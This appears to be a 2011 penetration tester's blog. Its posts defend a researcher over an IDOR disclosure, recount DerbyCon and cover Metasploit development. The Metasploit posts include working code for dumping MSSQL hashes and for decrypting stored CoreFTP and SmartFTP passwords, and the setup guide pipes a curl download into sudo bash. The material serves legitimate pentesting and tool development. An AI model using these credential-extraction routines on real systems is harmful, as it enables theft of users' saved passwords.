Monday 17 October 2011

Some facts on the First State Superannuation Issue

Some blogger has recently written a somewhat uninformed post on the whole Patrick Webster FSS issue. The author seems to be under some misapprehension about how these sorts of things work, which is concerning for someone who claims to be a web application security person and is taking to the pulpit to preach on the issue. Then again, why should we expect anything less from the Internet, right?

In his post the author states: " It should go without saying that at this point that he could, just by the actions he had taken up to this point, be in violation of any number of data privacy laws."

Really? Goes without saying? Actually, it doesn't. Let's take a look. The first statute they claim he is in violation of states the following:

308H   Unauthorised access to or modification of restricted data held in computer (summary offence)

(1)  A person:
(a)  who causes any unauthorised access to or modification of restricted data held in a computer, and
(b)  who knows that the access or modification is unauthorised, and
(c)  who intends to cause that access or modification,
      is guilty of an offence.
Maximum penalty: Imprisonment for 2 years.

(2)  An offence against this section is a summary offence.
(3)  In this section:
restricted data means data held in a computer, being data to which access is restricted by an access control system associated with a function of the computer.


Let's look at the other statute that is referenced:

478.1  Unauthorised access to, or modification of, restricted data
             (1)  A person is guilty of an offence if:
                     (a)  the person causes any unauthorised access to, or modification of, restricted data; and
                     (b)  the person intends to cause the access or modification; and
                     (c)  the person knows that the access or modification is unauthorised; and
                     (d)  one or more of the following applies:
                              (i)  the restricted data is held in a Commonwealth computer;
                             (ii)  the restricted data is held on behalf of the Commonwealth;
                            (iii)  the access to, or modification of, the restricted data is caused by means of a carriage service.
Penalty:  2 years imprisonment.
             (2)  Absolute liability applies to paragraph (1)(d).
             (3)  In this section:
restricted data means data:
                     (a)  held in a computer; and
                     (b)  to which access is restricted by an access control system associated with a function of the computer.



Look closely at (3) in both statutes. They can only apply if an access control was circumvented. Insecure Direct Object Reference is not bypassing an access control; it is the complete lack of an access control. I may not be a lawyer, but I suspect this charge would have a VERY hard time standing up in court.

It really is not hard to look up these statutes online. I would suggest that people actually read up on the subject matter. All in all, I would be surprised if this whole matter doesn't blow over. The worst I suspect will happen is that they make Webster sign the agreement on page 2 of their letter, or refuse him any further online access. They could, theoretically, even drop him as a customer, I suppose. I doubt any serious legal action will occur, but I could be wrong.

Mr Webster, I am behind you, and I am sure many others are too. Good luck.

Saturday 15 October 2011

When even Responsible Disclosure Fails

Disclaimer: The opinions expressed in this blog are my own, and do not reflect the views of anyone but myself.

In the latest incident, Patrick Webster of OSI Security is under threat of legal action. This threat comes after he disclosed a vulnerability to First State Superannuation. The vulnerability was a case of Insecure Direct Object Reference: by manipulating a GET parameter, Webster was able to access the statements of other customers. The legal threat is based on the idea that Webster violated Australian computer crime laws and bypassed a security measure. Direct Object Reference is not bypassing an access control; it is, by its very nature, the lack of an access control. Webster did not go public with this information, but rather went directly to the company to notify them of the flaw. On one hand, the company thanked him for his help. On the other hand, they sicced the police on him and are trying to hold him responsible for the cost of fixing the flaw.

Customers of First State Superannuation should be outraged at this. The company responsible for protecting their information has failed to do so, and when one of those customers demonstrated this failing, they held him responsible for it. The fact is, FSS has been negligent in providing proper security for their customers, and they should be held accountable for that failing. Let's make a hypothetical analogy:

A customer walks into his bank, and asks to access his safety deposit box. They ask him his box number, and he tells them the wrong box number by accident. They bring him another person's box without verifying his identity. When he explains the mistake to them, they call the police and have him arrested.

If you read about this scenario in the newspaper you would be outraged. Why should it be any different in this case?
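To make the technical point concrete, here is a hypothetical sketch of what an Insecure Direct Object Reference looks like versus an actual access control. This is not FSS's code; the function names and data are invented for illustration.

```ruby
# Hypothetical statement store; names and data invented for illustration.
STATEMENTS = {
  1001 => { owner: "alice", body: "Alice's statement" },
  1002 => { owner: "bob",   body: "Bob's statement"   }
}

# Vulnerable: the id from the GET parameter is used directly.
# There is no access control here to "bypass" -- it simply does not exist.
def fetch_statement_insecure(current_user, id)
  STATEMENTS[id]
end

# Fixed: an actual access control tied to the logged-in user.
def fetch_statement_secure(current_user, id)
  record = STATEMENTS[id]
  record if record && record[:owner] == current_user
end
```

In the vulnerable version, changing `?id=1001` to `?id=1002` hands Alice Bob's statement; in the fixed version the same request returns nothing. Nothing was circumvented in the first case, because there was nothing there to circumvent.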

What is even more deeply disturbing is the fact that this is far from an isolated incident. In the past year, there have been at least two other cases just like this. Earlier this year, a security researcher by the handle of Acidgen disclosed a buffer overflow vulnerability to the German software company Magix. Acidgen contacted the company with the information and had supposedly amiable communication with them. During the course of the conversation, he supplied them with a proof of concept that opened the calculator when run. He asked the company to let him know when the flaw would be patched so he could release the details after it had been fixed. This is when Magix began threatening legal action against Acidgen, claiming that sending the PoC constituted distribution of 'hacking tools' and that his intent to release the details after a patch constituted extortion.

Another example is the PlentyofFish.com dating site hack. Security researchers discovered a vulnerability in the site that allowed access to customers' private data. The researchers claim they simply informed the operators of the site of the vulnerability. In a bizarre twist, the owner of the site published a rambling blog post claiming that the researchers attempted to extort him. His story was strange in the extreme, indicating Russian mob involvement and extortion, and even originally implicated journalist Brian Krebs in the scheme.

What I see here is a very alarming trend. Companies are trying to redirect all blame for their own failings onto the very people who are trying to help make them more secure. If this trend continues, researchers will simply stop practicing responsible disclosure with most of these companies. In some cases disclosure will revert to full disclosure practices; other researchers will just keep silent.

So what would First State Superannuation say if Webster had kept silent, and then a month later someone far less scrupulous exploited this vulnerability to turn a profit? FSS should be thanking Webster for saving them all the embarrassment and possible repercussions of their irresponsible 'security' practices. These companies need to wake up and work with the community to help protect themselves, or things are only going to get worse.

Sunday 9 October 2011

DerbyCon Retrospective

Rel1k recently posted his thoughts on how DerbyCon went, and I thought I would share my own. I have not exactly made a secret of how I felt about DerbyCon. The speaker lineup was simply amazing; there were very few slots where I didn't have a talk I wanted to see. Unfortunately, I had to make some hard decisions between talks that ran at the same time.

When I go to conferences, I often find myself wandering aimlessly for periods: I'm not interested in the talks on at that time, and I don't really have anyone to talk to, so I wander about until I find someone I know. Every time I started to wander at DerbyCon, though, I would run into someone who wanted to talk about something. I had no real "down time" the entire conference.

I spent time hanging out with, or at least talking to, people who have been something like heroes to me. I have followed some of these people for years, and getting to talk to them was great. What was even more amazing was that many of them knew who I was! Shaking hands with Chris Gates for the first time was surreal for me; I have followed Chris since I started in security. I tracked dookie2000ca down and finally got him to sign my copy of Metasploit: A Penetration Tester's Guide. I got to spend time hanging out with jduck, corelanc0d3r, and sinn3r. Everywhere I went, I felt not just like an equal, but like we were all friends. The most telling thing about the Information Security community is that we call it the Community, not the Industry. DerbyCon embodied this spirit. The entire weekend felt more like a family reunion than a conference, and I was sad to leave.


I was privileged to get to take the Corelan Exploit Dev bootcamp. This training class was intense: we went from 1600 to 0200 both days and still didn't make it through everything. Peter Van Eeckhoutte (corelanc0d3r) took a class of 30 people from different backgrounds and walked them through Windows exploitation. Some people in the class had absolutely no experience in exploitation; despite this, Peter kept the entire class moving along, and as far as I could tell, nobody was lost. It was a shame that I had to miss parts of the conference for this training, but I would make the same choice again.

Brandon Perry and I wandered into the CTF room out of curiosity at one point. I had no plans to enter the CTF, so I hadn't really brought any tools with me. We decided to start playing around, not to seriously compete, but to have fun. We shared things we found with each other and were just having a good time. Before we knew it, we were on top of the leaderboard. The organizers came and asked us either to be scored as a team or to stop working together. I closed my account out and we kept working together under Brandon's. I was tied up with training for most of the conference, so Brandon spent a lot more time on the CTF than I did. In the end, we finished in 5th place. I think if we had gone in prepared from the start, and I had had the time to focus on it, we could have won. See Brandon's writeup on the CTF efforts here.

A few weeks before DerbyCon, I started trying to put together a #metasploit meetup. I wanted to get everyone from the Metasploit IRC channel together to hang out for a bit, have some drinks, and just have fun. Mubix came up with the idea of throwing a birthday party for MS08-067, so the two ideas merged naturally. Mubix got it all organized and pulled off a great event. There was a big cake and we all sang happy birthday. Then HD started handing out Red Bull and vodkas to EVERYONE at the party!


So I have ranted for long enough, I guess. The summary is this: DerbyCon was probably one of the best experiences I have had. I felt at home the entire time I was there. The entire weekend made me more certain than ever that I am where I belong, doing what I am meant to do. I can't possibly thank everybody enough, but thank you to the conference organizers, Rel1k, HD, jduck, corelanc0d3r, sinn3r, nullthreat, lincoln, bperry, Red, and everyone else I hung out with this weekend.

Saturday 8 October 2011

Update to the Metasploit Exploit Port Wishlist

Here is the latest update to the document I have been creating. This is a list of exploits that are in exploit-db but not in Metasploit. This list is generated by referencing the Knowledge Base in QualysGuard. Its accuracy is not guaranteed, but it should serve as a good starting point for anyone interested in porting exploits to Metasploit.

Saturday 30 July 2011

Metasploit: Dumping Microsoft SQL Server Hashes

New module just committed today: auxiliary/scanner/mssql/mssql_hashdump

This module takes given credentials and a port and attempts to log into one or more MSSQL servers. Once it has logged in, it checks to make sure it has sysadmin permissions. Assuming it has the needed permissions, it then grabs all of the database usernames and hashes. While it is in there, it also grabs all the database and table names. It reports all of this back into the database for later cracking. Support will be added to the John the Ripper functions in the future to include these database hashes. When it does, the database, table, and instance names will also be used to seed the JtR wordlists to enhance cracking efforts.
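For context on what the module is pulling: on SQL Server 2005 and later, login hashes live in the sys.sql_logins view, and each hash blob is a 0x0100 version header, a 4-byte salt, and a SHA-1 digest. The helper below is a rough illustrative sketch of serializing such a row for later cracking, not the module's actual code:

```ruby
# Sketch: serialize an MSSQL login hash row for later cracking.
# Hash layout (SQL Server 2005+): 0x0100 header | 4-byte salt | SHA-1 digest.
# A query like "SELECT name, password_hash FROM sys.sql_logins" returns
# the raw bytes; here we just hex-encode them back into the 0x... form.
def format_mssql_hash(username, hash_bytes)
  "#{username}:0x#{hash_bytes.unpack('H*').first}"
end
```

Feeding lines in this shape to a cracker (or, as the post describes, storing them in the database until the JtR integration lands) is the end goal of the module.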



msf  auxiliary(mssql_hashdump) > info

       Name: MSSQL Password Hashdump
     Module: auxiliary/scanner/mssql/mssql_hashdump
    Version: 13435
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  TheLightCosine

Basic options:
  Name                 Current Setting          Required  Description
  ----                 ---------------          --------  -----------
  PASSWORD             reallybadpassword        no        The password for the specified username
  RHOSTS               192.168.1.1,192.168.1.2  yes       The target address range or CIDR identifier
  RPORT                1433                     yes       The target port
  THREADS              1                        yes       The number of concurrent threads
  USERNAME             sa                       no        The username to authenticate as
  USE_WINDOWS_AUTHENT  false                    yes       Use windows authentification

Description:
  This module extracts the usernames and encrypted password hashes
  from a MSSQL server and stores them for later cracking. This module
  also saves information about the server version and table names,
  which can be used to seed the wordlist.

msf  auxiliary(mssql_hashdump) >

Friday 29 July 2011

Metasploit Development Environment In Ubuntu

I have spent some time today getting a new Metasploit Development Environment in place. With a lot of help from DarkOperator and egyp7 I think I have succeeded.

Step 1: Installing some Pre-Reqs

sudo aptitude install build-essential libssl-dev zlib1g zlib1g-dev subversion openssh-server screen bison flex jam exuberant-ctags libreadline-dev libxml2-dev libxslt-dev libpcap-dev libmysqlclient-dev libpq-dev curl git libsqlite3-dev
Step 2: Installing RVM

sudo bash < <(curl -s https://rvm.beginrescueend.com/install/rvm)
Edit the .bashrc file for each user that will be using RVM, adding the following lines to the end of it:

# Load RVM
if [[ -s "/usr/local/rvm/scripts/rvm" ]] ; then
  source "/usr/local/rvm/scripts/rvm"
fi

# Enable Tab Completion in RVM
[[ -r /usr/local/rvm/scripts/completion ]] && source /usr/local/rvm/scripts/completion

Then from bash run: source /usr/local/rvm/scripts/rvm


Next we install some necessary packages for rvm:

rvm pkg install zlib
rvm pkg install openssl
rvm pkg install readline


Then we install the ruby versions we want


rvm install 1.9.2 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr 



rvm 1.9.2 --default

rvm install 1.9.1 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr

rvm install 1.8.7 --with-zlib-dir=$rvm_path/usr --with-openssl-dir=$rvm_path/usr --with-readline-path=$rvm_path/usr


Then we install some needed Gems:


rvm gem install --no-rdoc --no-ri wirble pry pg nokogiri mysql sdoc msgpack hpricot sqlite3-ruby

Step 3: Adding DarkOperator's IRB customizations:

Create a file ~/.irbrc

The file should look like this:

puts "Loaded ~/.irbrc"

# Load Libraries
require 'rubygems'
require 'wirble'
require 'irb/completion'

# Enable Indentation in irb
IRB.conf[:AUTO_INDENT] = true

# Enable Syntax Coloring
Wirble.init
Wirble.colorize

# Get all the methods for an object that aren't basic methods from Object
class Object
  def local_methods
    (methods - Object.instance_methods).sort
  end
end


This customizes irb to give us syntax highlighting, tab completion, auto-indentation, and simple method enumeration.
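A quick demonstration of what local_methods buys you in an irb session (the Greeter class is just a made-up example):

```ruby
# Same monkeypatch as in the .irbrc above, repeated so this runs standalone.
class Object
  def local_methods
    (methods - Object.instance_methods).sort
  end
end

# A toy class to inspect; only its own methods survive the subtraction.
class Greeter
  def hello; "hi"; end
  def wave;  "o/"; end
end
```

Calling `Greeter.new.local_methods` returns just `[:hello, :wave]`, instead of the dozens of inherited methods that plain `methods` would bury them in.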

Step 4: Installing Metasploit:

Step 5: Running Metasploit:
If you want to run msfconsole with the packaged Ruby, just run 'msfconsole' from bash.
Otherwise select your version like this: rvm 1.8.7
Then call msfconsole with the full path: /opt/metasploit/msf3/msfconsole


That's all there is to it. You are now ready to test your Metasploit modules in various versions of Ruby, all from the same box.

Once again, thanks to egypt and DarkOperator who provided a lot of this guidance to me.

Tuesday 26 July 2011

Book Review: Metasploit a Penetration Tester's Guide

Earlier this month I picked up Metasploit: A Penetration Tester's Guide. I have, on multiple occasions, had the distinct pleasure of talking with two of the authors, Devon Kearns and Dave Kennedy. These two are shining examples of everything that is right with our industry. They are constantly giving back to the community at large and on an individual basis. They help others and share their knowledge and experience freely, without any judgement. This book is just an extension of that behaviour. So enough about them; let's talk about the book.

The book seeks to give a complete overview of the Metasploit Framework. This is a herculean task, and the authors no doubt had to make hard decisions about which topics to cover as the most important. All things considered, I think they did an amazing job covering the most important facets. They start off with the basics of the framework: how it's laid out, auxiliary modules, scanners, exploits, getting shell, and what to do once you get a Meterpreter session. Then we get to see some of the more advanced aspects, including writing custom fuzzers, developing exploits from scratch, and porting existing exploits into the framework. The book finishes with a small example penetration test from start to finish. The only topic they really seemed to skip was Metasploit's WMAP web scanning functionality, although some web application topics were covered through the use of FastTrack.

The way the authors cover the subject matter is excellent. They show you each step and call your attention to the most important parts along the way. It's as close as you can get to a demonstration in a book, and it works very well in my opinion. They truly highlight what makes Metasploit great: its flexibility. They show you how to modify existing modules or write your own, and how to use Metasploit in the actual exploit development process, allowing you to birth new exploits completely within the Framework.

I have been using Metasploit since version 2, and I still learned new things from this book, from small things like the setg command to more advanced features I had never used before, like msfpescan. Whether you are just starting to learn about penetration testing or have been doing it for years, this book is a must-read. Unless you are H.D. Moore, you will be hard pressed not to get value from it.

UPDATE: On a note of fairness, Metasploit Unleashed does cover WMAP functionality, even if it did not make it into the book.

Saturday 23 July 2011

Metasploit: Windows User Profile Data

The Metasploit team has added one of my latest submissions. It is a mixin for post modules that allows you to enumerate the user profile information on a Windows machine. A lot of the post modules that I and others have written relied on static values for determining paths to things like the AppData folder. While this worked, it was hardcoded for the English language and didn't account for other possible changes to the system.

The new Msf::Post::Windows::UserProfiles mixin seeks to address this issue by using the registry. Two new registry functions were added into every layer of Meterpreter: RegLoadKey() and RegUnloadKey(). These two functions, incidentally, should also work from a Windows shell session.

The first step is to look in the registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList. There is a series of subkeys here for the different SIDs that exist on the machine. Under each SID's subkey we will see a value called ProfileImagePath, which is the user's root profile directory.


The first function in the mixin is read_profile_list(). This parses the ProfileList key and all of its subkeys. While it's doing that, it reads through HKU to see which of these hives are already loaded and marks them appropriately.


This lets us know which users we should expect to see on the system, and where we can find their NTUSER.DAT files. If we look at the HKU key in our example, we see that only the Administrator hive is currently loaded.


So, next, the load_missing_hives() function takes all of the hives not currently loaded, along with the paths to their registry hives, and loads each one that it can. Below we see the additional hives loaded into HKU.


We then call parse_profiles(), which takes each hive and calls parse_profile() on it. This pulls the locations of directories like AppData, My Documents, and Local Settings, and assembles it all. We can see the relevant registry key under each user at HKU\<SID>\Software\Microsoft\Windows NT\CurrentVersion\Explorer\Shell Folders.
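For illustration, the Shell Folders key maps value names to paths roughly as below; one wrinkle worth knowing is that the value behind "My Documents" is actually named "Personal". The paths and the remapping hash here are invented; the real mixin reads these values out of the loaded hive.

```ruby
# Invented example of the name => path pairs under a user's Shell Folders key.
shell_folders = {
  "AppData"  => 'C:\Documents and Settings\Testuser1\Application Data',
  "Desktop"  => 'C:\Documents and Settings\Testuser1\Desktop',
  "Personal" => 'C:\Documents and Settings\Testuser1\My Documents'
}

# Sketch of the kind of remapping parse_profile() performs per user hive,
# normalizing registry value names into the keys the mixin exposes.
profile = {
  'AppData' => shell_folders["AppData"],
  'Desktop' => shell_folders["Desktop"],
  'MyDocs'  => shell_folders["Personal"]
}
```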



When we are done parsing this data, we may be done with the registry hives themselves, assuming we were only after filesystem data. Since we are done with the hives, we will want to unload them again to minimize our impact on the system. To do that we call unload_our_hives(), which unloads only the hives that we specifically loaded.

All of these functions are exposed in the mixin, meaning module writers can use as much or as little of it as they want. If a module writer just wants to grab the profile directory data, they can simply call grab_user_profiles(). This function walks through the entire process for them, returning an array of hashes containing all of this data. Below is an example/test module demonstrating the UserProfiles functionality.

-------------------------------------------

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'


class Metasploit3 < Msf::Post

  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::UserProfiles

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Load Reg Hive Test',
      'Description'   => %q{ This module exists simply to test
        the user profile enumeration mixin },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'TheLightCosine' ],
      'Platform'      => [ 'windows' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  def run
    grab_user_profiles().each do |user|
      print_status("***Username: #{user['UserName']} SID: #{user['SID']}***")
      print_status("Profile dir: #{user['ProfileDir']} LocalSettings dir: #{user['LocalSettings']}")
      print_status("AppData: #{user['AppData']} LocalAppData: #{user['LocalAppData']}")
      print_status("History: #{user['History']} Cookies: #{user['Cookies']} Favorites: #{user['Favorites']}")
      print_status("MyDocs: #{user['MyDocs']} Desktop: #{user['Desktop']}")
    end
  end

end

-------------------------------

Here is what the output of running this test module would look like:

-------------------------------------------------------

meterpreter > run post/windows/gather/hive_test

[*] ***Username: Testuser1 SID: S-1-5-21-1462624396-1657036728-2537704546-1009***
[*] Profile dir: C:\Documents and Settings\Testuser1 LocalSettings dir: C:\Documents and Settings\Testuser1\Local Settings
[*] AppData: C:\Documents and Settings\Testuser1\Application Data LocalAppData: C:\Documents and Settings\Testuser1\Local Settings\Application Data
[*] History: C:\Documents and Settings\Testuser1\Local Settings\History Cookies: C:\Documents and Settings\Testuser1\Cookies Favorites:  C:\Documents and Settings\Testuser1\Favorites
[*] MyDocs: C:\Documents and Settings\Testuser1\My Documents Desktop: C:\Documents and Settings\Testuser1\Desktop
[*] ***Username: Testuser2 SID: S-1-5-21-1462624396-1657036728-2537704546-1010***
[*] Profile dir: C:\Documents and Settings\Testuser2 LocalSettings dir: C:\Documents and Settings\Testuser2\Local Settings
[*] AppData: C:\Documents and Settings\Testuser2\Application Data LocalAppData: C:\Documents and Settings\Testuser2\Local Settings\Application Data
[*] History: C:\Documents and Settings\Testuser2\Local Settings\History Cookies: C:\Documents and Settings\Testuser2\Cookies Favorites:  C:\Documents and Settings\Testuser2\Favorites
[*] MyDocs: C:\Documents and Settings\Testuser2\My Documents Desktop: C:\Documents and Settings\Testuser2\Desktop
[*] ***Username: Administrator SID: S-1-5-21-1462624396-1657036728-2537704546-500***
[*] Profile dir: C:\Documents and Settings\Administrator LocalSettings dir: C:\Documents and Settings\Administrator\Local Settings
[*] AppData: C:\Documents and Settings\Administrator\Application Data LocalAppData: C:\Documents and Settings\Administrator\Local Settings\Application Data
[*] History: C:\Documents and Settings\Administrator\Local Settings\History Cookies: C:\Documents and Settings\Administrator\Cookies Favorites:  C:\Documents and Settings\Administrator\Favorites
[*] MyDocs: C:\Documents and Settings\Administrator\My Documents Desktop: C:\Documents and Settings\Administrator\Desktop
-------------------------------------------------

My latest password extraction module, for the SmartFTP client, uses this new functionality. I have also submitted a patch, still pending, that implements this functionality across numerous other post modules, using it to discover profile directories and, in some cases, to search the registry more thoroughly by loading missing user hives and unloading them again when done.

All told, this should help these modules function more completely on machines with non-English language packs, as well as be more thorough in searching the system for critical data.

Tuesday 12 July 2011

Take away the Tools

Indi303 recently had a post on twitter

Dear pentester: Throw away metasploit.... are u still a hacker? If you make excuses about why u are,but need it.. you aren't

It seems like a lot of people did not understand what he was saying, which rather proves the point, I think. He is not saying that pentesters should not use Metasploit, or that tools are bad. What he is saying is that knowing how to use tools does not make you a good pentester; it makes you a script kiddie. We have been interviewing candidates for two new pentest positions at my work, and I can tell you I feel this keenly.

During our in-person panel interview we ask a long series of questions designed to gauge depth. We start with a number of basic questions, where we are just looking for typical responses. These range from simple things like "How does traceroute actually work?" or "What is ring0?" to more complex questions like "How do you exploit blind SQL injection on Oracle?" or "Name two places besides the saved return pointer that you could overwrite to control program execution." The results we have seen on these questions alone are somewhat disappointing and very mixed.

Then we get to where the wheels always seem to come off: asking the candidates to actually demonstrate the things they have claimed knowledge of. We ask things like "Write out an HTTP GET request on the whiteboard." Some of you are probably saying to yourselves, "That is simple." I would agree, and yet no candidate has done it correctly yet. We draw out a URL with GET parameters and ask them to rewrite the request with a blind SQL injection attack.
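For reference, here is roughly what we are looking for on the whiteboard, sketched as Ruby strings. The host, path, and parameter are made up, and the injection shown is a classic boolean-based probe for illustration, not a complete attack:

```ruby
# A minimal, legal HTTP/1.1 GET request: request line, Host header,
# and a blank line terminating the headers. The CRLF line endings matter.
get_request = [
  "GET /account?statement_id=1001 HTTP/1.1",
  "Host: example.com",
  "Connection: close",
  "",
  ""
].join("\r\n")

# The same request with a boolean-based blind SQLi probe in the GET
# parameter: the URL-encoded payload decodes to 1001' AND '1'='1.
# Comparing this response against the "AND '1'='2" variant is what
# makes the technique "blind".
blind_probe = get_request.sub(
  "statement_id=1001",
  "statement_id=1001%27%20AND%20%271%27%3D%271"
)
```

If a candidate can produce both of these unaided, we know the claimed knowledge is real rather than borrowed from a tool.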

The fact is that most candidates fall apart when asked to demonstrate these skills outside the context of any sort of tool or crutch. One of my colleagues across the wall, in Incident Response land, has suggested that I am being too harsh, and that people who can only use tools still have some value. He is right, as far as it goes. But what happens when you have secured the environment past the point where you can just run Metasploit modules and pop boxes? When you need to find design flaws or 0days to exploit systems, a click-monkey is of no real value, except maybe for fetching coffee.


None of this means you should throw your tools away. Metasploit is a valuable tool and a framework for pentesting. Those of you who know me know that when I find something Metasploit doesn't do that I want it to, I try to add it. So while I can operate without Metasploit, and often have to, I continually try to reduce those occurrences by submitting enhancements to Metasploit. In this way I am also giving back to the community, something I would encourage EVERY pentester to do: if you see something Metasploit should do but doesn't, write it and submit it!

Or at least open up a feature request on their Redmine interface.

Thursday 7 July 2011

Information Security: Why we Fail

The very first word seems to be our downfall: Information. If we don't have all of it, we have already failed. Suppose you are in a sizable organisation, and suppose that this organisation has grown inorganically over the years. You have a problem, and that problem is that there is no single authoritative source of information about your environment.

Now, as a Security Engineer or Penetration Tester, how can you protect that environment from compromise? The answer: you can't. At least not until you rectify this problem first. The simple fact that is often overlooked is this: it takes only one machine being compromised for the situation to spin out of control. If your knowledge of your environment is incomplete, and there are systems your security team is not covering because they don't know they exist, you have failed. It is a matter of when, not if, you suffer a serious breach. You can secure all of the other hosts on the perimeter, and it will amount to nothing. The host with SQLi in that subnet you never knew about will let the attackers in. Then they are on a trusted machine somewhere in your environment, and their possible avenues of attack are countless. Higher-ups within the organisation will demand answers: "Why didn't we catch this problem before? Why are we paying you people?"

So here's the point of my rant: if you are an org attempting a major Information Security initiative, make sure you equip your security people with the information they need. If it isn't available, then you need to apply the brakes and fix that problem before anything else.


  1. Identify all of the systems in your environment and where they are. Chances are you're going to find systems that should have been decommed years ago. There is an instant monetary saving when you shut them off, as well as a positive step for security.
  2. Document all of these systems: what they are, who owns them, etc. Keep this documentation up to date going forward.
  3. Identify the roles and responsibilities of those systems, and segregate portions of your network appropriately. Implement proper access controls between these segregated environments. If you worry about PCI compliance, this is a MUST.
  4. Now set your security people to work. Deploy vulnerability scanning solutions, arrange penetration test engagements, implement an SDLC, etc.

If you try to skip the first three steps, you will fail. I guarantee it.

Tuesday 21 June 2011

Stealing CoreFTP Passwords with Metasploit

Well folks, I'm at it again. The next client to fall is the CoreFTP client. CoreFTP stores its saved passwords in the Windows Registry.

They can be found under HKEY_USERS\\Software\FTPWare\CoreFTP\Sites, with numbered keys for each saved site. The passwords are stored as ASCII representations of their hex values (like most of the others we have seen). The ciphertext is encrypted using AES-128-ECB with a static key of "hdfzpysvpzimorhk".

So once again we rely on our Ruby OpenSSL implementation to do the decoding for us. First we pack the text from the registry:
               cipher = [encoded].pack("H*")
Then we set up our AES implementation:

                aes = OpenSSL::Cipher::Cipher.new("AES-128-ECB")
                aes.padding = 0
                aes.decrypt
                aes.key = "hdfzpysvpzimorhk"
                password = aes.update(cipher) + aes.final
                return password

The important thing to note here is the aes.padding property. This MUST be set to 0 or you will get bad decrypt errors. It took me quite a while to figure that out. The result, as usual, is an easily decrypted password. This once again highlights that static-key encryption in a product like this is next to useless. Products that save sensitive passwords should prompt the user to pick a master password, and use that as the encryption key. This forever separates the encryption key from the software. It's the only real way to keep that data secure.
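Putting the pieces above together, here is a minimal standalone sketch of the decryption (plain Ruby with the stdlib OpenSSL bindings, outside of Metasploit). Since padding is disabled, decrypted values may carry trailing null bytes:

```ruby
require 'openssl'

# CoreFTP's static AES-128-ECB key, as described above.
CORE_FTP_KEY = "hdfzpysvpzimorhk"

# Takes the hex string pulled from the registry, returns the plaintext.
def decrypt_coreftp(encoded)
  cipher = [encoded].pack("H*")             # hex text -> raw ciphertext bytes
  aes = OpenSSL::Cipher.new("AES-128-ECB")
  aes.decrypt
  aes.padding = 0                           # critical: avoids bad decrypt errors
  aes.key = CORE_FTP_KEY
  aes.update(cipher) + aes.final
end
```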

I submitted this module today, so it should hopefully get committed sometime in the next couple of days. Keep your eyes peeled for post/windows/gather/enum_coreftp_passwords.rb.

Sunday 19 June 2011

SmartFTP Password Recovery with Metasploit - The details

So last night I briefly mentioned the new additions I submitted to Metasploit. It looks like they will get merged after the 3.7.2 release; Metasploit is in a feature freeze at the moment for that release. I wanted to take the opportunity to discuss how the SmartFTP password recovery module works. It might help others who want to write similar modules in the future.

The module can be seen on the Metasploit website here:



So let's get the simple stuff out of the way first. We pull the OS information and the root system drive information from the Meterpreter stdapi. We then check the OS to see whether we need to be looking for "Documents and Settings" or "Users" off the system root. We then drop into the appropriate directory and enumerate the individual user directories. We build the candidate directory paths from the combination of all of these factors.

The enum_subdirs function then takes each of these potential SmartFTP data folder paths. If a path does not exist, or we do not have permission to access it, it will throw an exception caught by the rescue statement, and we move on to the next path. If we can access the path, we enumerate all of the items in that directory. If an item ends in .xml, it is added to the list of XML files to be parsed. If it is not an XML file, it is assumed to be a directory and is recursively passed back to the enum_subdirs function. In the rare case that the item is not actually a directory, it will throw an exception which is still caught by the rescue. Once everything has been recursively enumerated, we should have a list of XML files in the session array @xmlfiles.

For each XML file in the array we then run get_xml. In get_xml we first try to open the file for reading. If for any reason we cannot do that, we catch an exception, let the user know, and move on to the next file. If we can open it, then we read all of the data into memory and send it to the parse_xml function. parse_xml uses the REXML library to parse the XML. We pull the host, port, username, and encrypted password. If no encrypted password is found, we skip this item and move to the next one, since there is no password to steal. Once we have the encrypted password we pass it to the real meat and potatoes: our decryption routine.
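The parsing step looks roughly like the following sketch using Ruby's stdlib REXML. Note the element names here (Host, Port, User, Password) are placeholders for illustration; check the module source for SmartFTP's actual XML schema:

```ruby
require 'rexml/document'

# A simplified favourites entry; the element names are illustrative only.
xml = <<~XML
  <FavoriteItem>
    <Host>ftp.example.com</Host>
    <Port>21</Port>
    <User>alice</User>
    <Password>9722972FC57CAE5A78DBD64E23968440C794</Password>
  </FavoriteItem>
XML

doc  = REXML::Document.new(xml)
host = doc.elements['//Host'].text
# Guard against entries with no saved password before decrypting.
pass = doc.elements['//Password'] && doc.elements['//Password'].text
```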

The first thing we do is unpack this encoded data as a series of hex bytes; the string is in fact a hex representation of raw bytes. So if the encoded string is "9722972FC57CAE5A78DBD64E23968440C794" then it is actually \x97\x22\x97 and so on.
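In Ruby, that conversion is a one-liner with Array#pack:

```ruby
encoded = "9722972FC57CAE5A78DBD64E23968440C794"
raw = [encoded].pack("H*")   # hex text -> raw bytes: "\x97\x22\x97..."
# 36 hex characters become 18 raw bytes, ready to hand to the CryptoAPI calls.
```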

So now let's take a moment to look at the new Railgun function definitions I have added. These functions come from Advapi32.dll. This DLL is already defined in Railgun, so we just have to add the functions to its definition:


#Functions for Windows CryptoAPI
railgun.add_function('advapi32', 'CryptAcquireContextW', 'BOOL',[
['PDWORD', 'phProv', 'out'],
['PWCHAR', 'pszContainer', 'in'],
['PWCHAR', 'pszProvider', 'in'],
['DWORD', 'dwProvType', 'in'],
['DWORD', 'dwflags', 'in']])

railgun.add_function('advapi32', 'CryptCreateHash', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'Algid', 'in'],
['DWORD', 'hKey', 'in'],
['DWORD', 'dwFlags', 'in'],
['PDWORD', 'phHash', 'out']])

railgun.add_function('advapi32', 'CryptHashData', 'BOOL',[
['LPVOID', 'hHash', 'in'],
['PWCHAR', 'pbData', 'in'],
['DWORD', 'dwDataLen', 'in'],
['DWORD', 'dwFlags', 'in']])

railgun.add_function('advapi32', 'CryptDeriveKey', 'BOOL',[
['LPVOID', 'hProv', 'in'],
['DWORD', 'Algid', 'in'],
['LPVOID', 'hBaseData', 'in'],
['DWORD', 'dwFlags', 'in'],
['PDWORD', 'phKey', 'inout']])

